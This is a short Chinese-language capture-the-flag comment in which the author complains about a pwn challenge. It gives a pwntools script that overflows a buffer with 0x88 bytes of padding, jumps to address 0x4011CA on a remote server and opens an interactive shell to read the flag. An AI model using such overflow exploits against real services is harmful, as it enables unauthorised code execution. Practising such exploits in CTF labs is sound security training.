这题真恶心，要不是kali报错，我都不知道我pwn进去了，打通之后ls查看没内容，必须cat flag，什么都没显示出来后，在输入ls才看到flag，我真服了，还不是根目录。

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

from pwn import* io = remote('82.157.146.43',？) payload=b'p'*0x88+p64(0x4011CA) io.send(payload) io.interactive() 用这个程序肯定没问题，就看你在kali中怎么执行操作了。这题真勾八